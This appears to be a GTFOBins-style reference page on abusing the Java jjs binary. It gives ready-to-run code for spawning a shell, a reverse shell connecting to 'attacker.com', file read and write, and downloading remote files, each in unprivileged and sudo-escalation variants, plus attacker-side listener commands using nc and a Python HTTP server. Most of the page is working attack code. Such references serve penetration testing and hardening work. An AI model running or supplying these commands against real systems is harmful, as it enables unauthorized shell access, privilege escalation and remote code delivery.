.. / jjs

Sponsor Fork Star

• Shell
• Reverse shell
• File write
• File read
• Download

Shell

This executable can spawn an interactive system shell.

• Unprivileged

  This function can be performed by any unprivileged user.

  jjs
  Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -c $@|sh _ echo sh </dev/tty >/dev/tty 2>/dev/tty').waitFor()

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  jjs
  Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -c $@|sh _ echo sh </dev/tty >/dev/tty 2>/dev/tty').waitFor()

Reverse shell

This executable can send back a reverse system shell to a listening attacker.

• Unprivileged

  This function can be performed by any unprivileged user.

  jjs
  var host='attacker.com';
  var port=12345;
  var ProcessBuilder = Java.type('java.lang.ProcessBuilder');
  var p=new ProcessBuilder('/bin/sh', '-i').redirectErrorStream(true).start();
  var Socket = Java.type('java.net.Socket');
  var s=new Socket(host,port);
  var pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
  var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){ while(pi.available()>0)so.write(pi.read()); while(pe.available()>0)so.write(pe.read()); while(si.available()>0)po.write(si.read()); so.flush();po.flush(); Java.type('java.lang.Thread').sleep(50); try {p.exitValue();break;}catch (e){}};p.destroy();s.close();

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  jjs
  var host='attacker.com';
  var port=12345;
  var ProcessBuilder = Java.type('java.lang.ProcessBuilder');
  var p=new ProcessBuilder('/bin/sh', '-i').redirectErrorStream(true).start();
  var Socket = Java.type('java.net.Socket');
  var s=new Socket(host,port);
  var pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
  var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){ while(pi.available()>0)so.write(pi.read()); while(pe.available()>0)so.write(pe.read()); while(si.available()>0)po.write(si.read()); so.flush();po.flush(); Java.type('java.lang.Thread').sleep(50); try {p.exitValue();break;}catch (e){}};p.destroy();s.close();

  TTY

  The spawned shell is just a dummy REPL that can only run simple terminal commands.

  Listener

  A TCP server can be used on the attacker box to receive the shell.

  nc -l -p 12345

File write

This executable can write data to local files.

• Unprivileged

  This function can be performed by any unprivileged user.

  jjs
  var FileWriter = Java.type('java.io.FileWriter');
  var fw=new FileWriter('/path/to/output-file');
  fw.write('DATA');
  fw.close();

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  jjs
  var FileWriter = Java.type('java.io.FileWriter');
  var fw=new FileWriter('/path/to/output-file');
  fw.write('DATA');
  fw.close();

File read

This executable can read data from local files.

• Unprivileged

  This function can be performed by any unprivileged user.

  jjs
  var BufferedReader = Java.type('java.io.BufferedReader');
  var FileReader = Java.type('java.io.FileReader');
  var br = new BufferedReader(new FileReader('/path/to/input-file'));
  while ((line = br.readLine()) != null) { print(line); }

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  jjs
  var BufferedReader = Java.type('java.io.BufferedReader');
  var FileReader = Java.type('java.io.FileReader');
  var br = new BufferedReader(new FileReader('/path/to/input-file'));
  while ((line = br.readLine()) != null) { print(line); }

Download

This executable can download remote data.

• Unprivileged

  This function can be performed by any unprivileged user.

  jjs
  var URL = Java.type('java.net.URL');
  var ws = new URL('http://attacker.com/path/to/input-file');
  var Channels = Java.type('java.nio.channels.Channels');
  var rbc = Channels.newChannel(ws.openStream());
  var FileOutputStream = Java.type('java.io.FileOutputStream');
  var fos = new FileOutputStream('/path/to/output-file');
  fos.getChannel().transferFrom(rbc, 0, Number.MAX_VALUE);
  fos.close();
  rbc.close();

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  jjs
  var URL = Java.type('java.net.URL');
  var ws = new URL('http://attacker.com/path/to/input-file');
  var Channels = Java.type('java.nio.channels.Channels');
  var rbc = Channels.newChannel(ws.openStream());
  var FileOutputStream = Java.type('java.io.FileOutputStream');
  var fos = new FileOutputStream('/path/to/output-file');
  fos.getChannel().transferFrom(rbc, 0, Number.MAX_VALUE);
  fos.close();
  rbc.close();

  Sender

  An HTTP server can be used on the attacker box to send the data.

  python -m http.server 80

Source | History